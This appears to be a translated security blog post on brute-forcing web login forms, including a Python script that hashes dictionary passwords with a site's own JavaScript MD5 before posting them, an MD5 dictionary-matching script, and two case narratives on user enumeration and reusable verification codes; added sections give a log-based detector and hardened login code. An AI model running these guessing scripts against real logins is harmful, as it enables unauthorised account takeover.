0x01 Preface
The web login interface is the channel from a website's front end into its back end. As such, the login and management interface is exposed to common web attacks such as SQL injection, XSS, weak passwords and brute-force guessing. This article gives a simple analysis of the approach to web brute-force guessing and illustrates it with vulnerability examples.
0x02 Approach
A web login interface has three main elements: the user name, the password and the verification code (CAPTCHA). The simplest approach is:
1. Obtain user names, for example from login error prompts, article author or signature fields on the site, social engineering, etc.
2. Guess passwords with an effective dictionary.
3. Recognise or bypass the verification code; common cases are a verification code checked separately from the user name and password, a verification code that is not refreshed automatically, and a reusable verification code that can be recognised once and replayed.
By how the HTTP request carries the data, logins fall roughly into two types:
Type 1: plaintext transmission
This is the most common kind of web application: no verification code and no restriction on failed logins, so only a user name and password are needed and the dictionary can be loaded directly for brute forcing. The most common tool is Burp Suite Intruder, which supports several attack modes: a single dictionary in one position, the same dictionary in several positions, several dictionaries matched position by position, and every combination of several dictionaries (cluster bomb).
Type 2: front-end JS encryption
Many web applications now hash or encrypt the password with JavaScript before sending it to the server, so the password captured with a proxy tool is the processed value, which adds some trouble to brute forcing. The following is an analysis of brute forcing against JS encryption.
0x03 Brute forcing JS-encrypted passwords
Common JS encryption methods are MD5, Base64 and SHA1. Here a simple demo is written as a test.
Login.html
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<title>用户登录</title>
<script type="text/ecmascript" src="md5.js"></script>
<script>
function checkInput() {
var password_input = document.getElementById('password');
var password_md5 = document.getElementById('password_md5');
password_md5.value =hex_md5(password_input.value);
return true;
}
</script>
</head>
<body>
<form action="login.php" method="post" onsubmit="return checkInput()">
用户:<input type="text" id="username" name="username"> <br/>
密码:<input type="password" id="password"> <br/>
<input type="hidden" id="password_md5" name="password">
<input type="submit" value="提交" />
</form>
</body>
</html>
Submit the form and capture the request. You can see that the value in the password field has been hashed:
Common JS MD5 hashing can be handled in two ways: one is to use Intruder, which supports a range of hashing and encoding payload processing rules, to hash the password field; the other is to write a Python script. Those familiar with the algorithm can reimplement it, or the website's own JS file can be used directly to hash the password field.
3.1 Burp Suite Intruder
1. Capture the request and send it to Intruder, mark the relevant parameters, and select the fourth attack type, "cluster bomb".
2. Select the user name dictionary and the password dictionary respectively. When setting up the password dictionary, add an MD5 hash payload processing rule so that the password field is hashed.
3. Start the attack and judge success by the length of the response. The MD5 value of the password field for the successful user name is obtained. admin: 21232f297a57a5a743894a0e4a801fc3
4. The MD5 is cracked successfully, giving the user name and password admin / admin.
3.2 PyExecJS
Here Python with PyExecJS is used to execute the JS and reproduce the front end's hashing of the account password.
Preparation:
pip install PyExecJS
Phantomjs Download: https://bitbucket.org/aria/phantomjs/downloads/phantomjs-2.1.1-windows.zip
Python script for brute forcing (Python 3; the thread pool uses the standard library instead of the old threadpool package):
import requests
import execjs
from concurrent.futures import ThreadPoolExecutor

def getpass(plain):
    # Run the site's own md5.js in PhantomJS so the hash is exactly what the browser would send
    with open('md5.js', 'r') as js:
        source = js.read()
    phantom = execjs.get('PhantomJS')
    ctx = phantom.compile(source)
    return ctx.call('hex_md5', plain)

def login(user, passwd):
    url = "http://127.0.0.1/login.php"
    payload = {'username': user, 'password': getpass(passwd)}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    try:
        response = requests.post(url, data=payload, headers=headers, timeout=5)
        # The demo login.php answers with a page containing "fail" on a bad login
        if response.text.count('fail') < 1:
            print('[success] ' + url + ":" + user + ':' + passwd)
    except requests.RequestException:
        pass

def getLines(fileName):
    # Read a dictionary file, skipping blank lines and '#' comments
    lines = []
    with open(fileName, 'r') as fd:
        for line in fd:
            line = line.strip()
            if not line or line.startswith('#'):
                continue
            lines.append(line)
    return lines

if __name__ == '__main__':
    username_list = getLines('user.dict')
    password_list = getLines('pass.dict')
    # Every user/password combination, like Intruder's cluster bomb mode, on 20 threads
    with ThreadPoolExecutor(max_workers=20) as pool:
        for user in username_list:
            for passwd in password_list:
                pool.submit(login, user, passwd)
The user account password is brute forced successfully.
0x04 Vulnerability instances
Here are two vulnerability examples. In practice, brute force can be applied flexibly depending on the vulnerability; it is simple and extremely destructive.
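Seen from the server side, a run of the script above (or of Intruder's cluster bomb) is a burst of POSTs to login.php from one address, most of them answered with a failure page of identical size, which is the same length signal the attacker keys on. The detector below is an added example, not part of the original post; it parses constructed access-log lines in combined format (the addresses, timestamps and sizes are made up) and flags that pattern.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def detect_login_bursts(lines, path="/login.php", window_s=60, threshold=10):
    """Flag IPs that POST to `path` at least `threshold` times inside any `window_s` window
    (lines in log order). Returns {ip: {"peak": most POSTs in one window, "sizes": sizes seen}}."""
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    sizes = defaultdict(set)      # ip -> distinct response sizes (failures repeat one size)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != path:
            continue
        ip, q = rec["ip"], recent[rec["ip"]]
        q.append(rec["ts"])
        sizes[ip].add(rec["size"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), flagged.get(ip, {}).get("peak", 0))
            flagged[ip] = {"peak": peak, "sizes": sizes[ip]}
    return flagged

def constructed_log():
    """Constructed sample (not from the post): one normal login, then 13 POSTs in 13 s from one
    address, 12 of them with the same failure-page size and one with a different size."""
    post = ('{ip} - - [10/Oct/2023:13:5{m}:{s:02d} +0000] "POST /login.php HTTP/1.1" '
            '200 {size} "-" "Mozilla/5.0"')
    lines = ['198.51.100.4 - - [10/Oct/2023:13:55:01 +0000] "GET /login.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
             post.format(ip="198.51.100.4", m=5, s=9, size=1043)]
    lines += [post.format(ip="203.0.113.7", m=6, s=i, size=512) for i in range(12)]
    lines.append(post.format(ip="203.0.113.7", m=6, s=12, size=1043))
    return lines

if __name__ == "__main__":
    for ip, info in detect_login_bursts(constructed_log()).items():
        print(ip, "peak", info["peak"], "POSTs per minute, response sizes", sorted(info["sizes"]))
```

The single different-sized response inside the flagged burst is the one worth checking first, since that is what a successful guess looks like in the same log.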
Vulnerability example 1: unauthorized access to user names + password JS encryption + reusable verification code
Vulnerability scenario: the website's home page contains a login module with user name, password and verification code. Testing with normal input shows that the password is transmitted with JS encryption, and that the verification code is not refreshed automatically and can be reused.
1. Scanning the website for sensitive files shows that the system has an unauthorized-access flaw: the back-end log management module can be reached directly by URL, which yields user login names.
2. With the user names obtained this way, load the password dictionary, hash the dictionary passwords and brute force; this succeeds in recovering the MD5 value of user TB's password: 6846860684f05029abccc09a53cd66f1
3. Cracking the MD5 gives the corresponding plaintext: a111111
Tip: what if the MD5 cannot be cracked? We know this MD5 value corresponds to one of the entries in our own password dictionary, so a Python script can hash the dictionary and compare the MD5 values.
Python script:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import hashlib

src = '6846860684f05029abccc09a53cd66f1'   # the MD5 recovered by brute forcing

def get_line():
    # Hash each line of the password dictionary and compare it with src
    with open('1.txt') as f:
        print('start:')
        for line in f:
            line = line.strip()
            if not line:
                continue
            tmp = hashlib.md5(line.encode('utf-8')).hexdigest()
            print(line + " :" + tmp)
            if tmp == src:
                print(src + u': md5对应的值为:' + line)
                break

if __name__ == '__main__':
    get_line()
Test screenshot:
5. Log in to the system successfully with the obtained user name and the cracked password.
Vulnerability scenario 2: login error prompt + recognisable verification code
1. Enter the user name admin with any password and verification code; the prompt says the user name you entered does not exist, please re-enter.
2. With the verification-code recognition engine of PkAV HTTP Fuzzer 1.2, the verification code can be recognised automatically.
3. Guided by the login error prompt, load the user name dictionary and brute force. When the prompt changes to "the password you entered is incorrect, please re-enter", the user name sysadmin has been found; then load the password dictionary and brute force that user's password.
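Both scenarios come down to server-side login logic: in example 1 the verification code stays valid after it has been checked once, and in example 2 the error text distinguishes an unknown user name from a wrong password. The pair of handlers below is an added illustration, not the post's login.php (which is never shown); it assumes an in-memory user table storing the MD5 the page's form submits and a random token standing in for the captcha image. The weak handler reproduces both flaws; the hardened one consumes the code on every attempt, answers uniformly and caps failures per account.

```python
import hashlib
import hmac
import secrets

# Constructed demo state (not the original post's login.php). The stored credential is the
# MD5 the page's form submits, so whatever the browser sends is what gets compared.
USERS = {"admin": hashlib.md5(b"admin").hexdigest()}
MAX_ATTEMPTS = 5
GENERIC_ERROR = "Invalid user name, password or verification code"

class LoginSession:
    """Per-session state: the current verification-code answer and failures per account."""
    def __init__(self):
        self.captcha = None
        self.failures = {}

    def new_captcha(self):
        # Stands in for the text rendered into a fresh captcha image
        self.captcha = secrets.token_hex(2)
        return self.captcha

def login_weak(session, username, password_md5, captcha):
    """The pattern from the two examples above: the verification code is checked but never
    invalidated, so one solve serves a whole dictionary run, and the error text reveals
    whether the user name exists."""
    if captcha != session.captcha:
        return False, "Wrong verification code"
    if username not in USERS:
        return False, "The user name you entered does not exist"
    if password_md5 != USERS[username]:
        return False, "The password you entered is incorrect"
    return True, "ok"

def login_hardened(session, username, password_md5, captcha):
    """Verification code is single-use and cleared before the credential check, the error
    message is uniform, and consecutive failures per account are capped."""
    expected, session.captcha = session.captcha, None
    if expected is None or not hmac.compare_digest(captcha.encode(), expected.encode()):
        return False, GENERIC_ERROR
    if session.failures.get(username, 0) >= MAX_ATTEMPTS:
        return False, GENERIC_ERROR
    stored = USERS.get(username, "0" * 32)      # compare something even for unknown users
    if hmac.compare_digest(password_md5.encode(), stored.encode()) and username in USERS:
        session.failures.pop(username, None)
        return True, "ok"
    session.failures[username] = session.failures.get(username, 0) + 1
    return False, GENERIC_ERROR
```

Note that the client-side MD5 changes nothing here: the server compares the submitted hash directly, so the hash is the credential and must be protected by TLS plus these server-side limits, not by the JS.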
About Me
A network security enthusiast with a stubborn pursuit of technology, committed to sharing original, high-quality practical content, including but not limited to penetration testing, WAF bypass, code audit, and security operations and maintenance.